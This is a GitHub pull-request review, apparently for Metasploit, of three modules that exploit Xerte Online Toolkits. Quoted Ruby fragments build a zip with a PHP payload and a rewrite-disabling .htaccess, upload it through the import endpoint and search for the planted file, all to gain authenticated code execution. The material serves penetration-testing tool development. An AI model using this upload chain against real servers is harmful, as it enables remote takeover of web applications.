Add three modules for exploiting Xerte Online Toolkits #20849
Conversation
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
Would you mind to provide instructions how to setup the target?
| 'uri' => normalize_uri(target_uri.path+"/version.txt"), | ||
| }) | ||
|
|
||
| if res && res.code.to_i == 200 |
There was a problem hiding this comment.
| if res && res.code.to_i == 200 | |
| if res&.code == 200 |
| print_status("Performing version check - this may not be reliable") | ||
| res = send_request_cgi({ | ||
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path+"/version.txt"), |
There was a problem hiding this comment.
| 'uri' => normalize_uri(target_uri.path+"/version.txt"), | |
| 'uri' => normalize_uri(target_uri.path,"version.txt"), |
| }) | ||
|
|
||
| if res && res.code.to_i == 200 | ||
| if res.body.split(' ').length() == 0 |
There was a problem hiding this comment.
Better approach is to extract version using regex and then use Rex::Version - this will allow you to extract version and compare it with other version more efficiently and with less code.
| return Exploit::CheckCode::Vulnerable | ||
| else | ||
| return Exploit::CheckCode::Safe | ||
| end | ||
| end | ||
| return Exploit::CheckCode::Safe |
There was a problem hiding this comment.
We usually leave message along with CheckCode, which provides clearer information why specific CheckCode has been returned.
There was a problem hiding this comment.
Yes, this was somewhat hacky. The version check is pretty unreliable. During my initial research, the version information is not always accurate. Some installs simply say 3.14, while others specify the revision (3.14.0) Would it be better to remove the check function entirely?
| vprint_line("Checking template ID #{a}") | ||
| res = send_request_cgi({ # this causes the template to become locked | ||
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path+"/edithtml.php?template_id=#{a}"), |
There was a problem hiding this comment.
| 'uri' => normalize_uri(target_uri.path+"/edithtml.php?template_id=#{a}"), | |
| 'uri' => normalize_uri(target_uri.path,"edithtml.php"), | |
| 'vars_get' => { 'template_id' => a}, |
| for a in 1..100 do | ||
| res = send_request_cgi({ | ||
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path+"/USER-FILES/#{a}--Nottingham/media/#{php_filename}.txt"), |
There was a problem hiding this comment.
| 'uri' => normalize_uri(target_uri.path+"/USER-FILES/#{a}--Nottingham/media/#{php_filename}.txt"), | |
| 'uri' => normalize_uri(target_uri.path, 'USER-FILES', "#{a}--Nottingham", 'media', "#{php_filename}.txt"), |
| zip.add_file("media/#{php_filename}", payload.encoded) | ||
| zip.add_file("media/#{php_filename}.txt", "THIS_IS_IT") | ||
| zip.add_file("media/.htaccess", htaccess_payload) | ||
| zip.add_file("data.xml", %q{ | ||
| <learningObject targetFolder="site" language="" name="Project Title" theme="default"> | ||
| <page linkID="PG1360232941652" name="Page Title" subtitle="Enter Page Subtitle"> | ||
| <section linkID="PG1360232936371" name="This is section One"/> | ||
| </page> | ||
| </learningObject> | ||
| }) | ||
| zip.add_file("mal-theme.info", %q{ | ||
| name: mal-theme | ||
| display name: Flat: Black & Green | ||
| description: A Black and Green theme similar to the Apereo website colours e.g. Aztec header and footer, off white background, grey and green accents. | ||
| enabled: yes | ||
| preview: apereo.jpg | ||
| }) | ||
| zip.add_file("template.xml", %q{ | ||
| <learningObject editorVersion="3" targetFolder="Nottingham" name="Enter Project Title" language="" navigation="Linear" textSize="12" theme="xot1" themeIcons="false" displayMode="fill window" responsive="true" /> | ||
| }) |
There was a problem hiding this comment.
Can we randomize some of these values?
| <learningObject editorVersion="3" targetFolder="Nottingham" name="Enter Project Title" language="" navigation="Linear" textSize="12" theme="xot1" themeIcons="false" displayMode="fill window" responsive="true" /> | ||
| }) | ||
|
|
||
| zip.save_to("debug.zip") |
There was a problem hiding this comment.
Can filename be randomized?
|
|
||
| send_request_cgi( | ||
| 'method' => 'POST', | ||
| 'uri' => normalize_uri(target_uri.path+"/website_code/php/import/import.php"), |
There was a problem hiding this comment.
| 'uri' => normalize_uri(target_uri.path+"/website_code/php/import/import.php"), | |
| 'uri' => normalize_uri(target_uri.path, 'website_code', 'php','import', 'import.php'), |
| def php_filename | ||
| @php_filename ||= Rex::Text.rand_text_alpha(8) + '.php' | ||
|
|
||
| end | ||
| def htaccess_payload | ||
| @htaccess_payload = %q{ | ||
| <IfModule mod_rewrite.c> | ||
| RewriteEngine Off | ||
| </IfModule> | ||
| } | ||
| end | ||
| def zip_filename | ||
| @zip_filename ||= Rex::Text.rand_text_alpha(8) + 'mal-template.zip' | ||
| end |
| vprint_status("found media " +@media_path) | ||
| vprint_status("found web path " +@web_path) | ||
| vprint_status("found template " +@template_id) |
There was a problem hiding this comment.
Potentially to avoid the nil pointer exception:
3.3.8 :001 > "found media " + nil
(irb):1:in `+': no implicit conversion of nil into String (TypeError)
"" + nil
This:
| vprint_status("found media " +@media_path) | |
| vprint_status("found web path " +@web_path) | |
| vprint_status("found template " +@template_id) | |
| vprint_status("found media #{@media_path.inspect}" | |
| vprint_status("found web path #{@web_path.inspect}" | |
| vprint_status("found template #{@template_id.inspect}" |
|
I'll work on incorporating these changes. What is the proper way to incorporate those edits? |
3 participants
This PR adds three modules I developed to exploit the Xerte Online Toolkits 3.14.0 and <= 3.13.7.
Verification
msfconsoleuse exploit/multi/http/xerte_authenticated_rce_uploadImage